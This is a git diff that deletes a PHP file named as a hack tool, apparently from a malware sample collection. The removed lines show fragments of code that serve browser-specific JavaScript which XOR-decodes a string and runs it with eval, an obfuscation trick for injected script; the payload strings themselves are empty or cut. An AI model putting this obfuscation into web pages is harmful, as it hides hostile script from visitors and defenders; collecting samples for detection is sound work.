diff --git a/PHP/HackTool.PHP.Mphak.c b/PHP/HackTool.PHP.Mphak.c deleted file mode 100644 index 010b89b3..00000000 --- a/PHP/HackTool.PHP.Mphak.c +++ /dev/null @@ -1,65 +0,0 @@ -str = "'.$new.'";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);'; -} -if ($java == true) echo ''; -elseif ($browser == "MSIE") echo ''.encode ('').""; -elseif ($browser == "Opera") echo encode (''); -?> \ No newline at end of file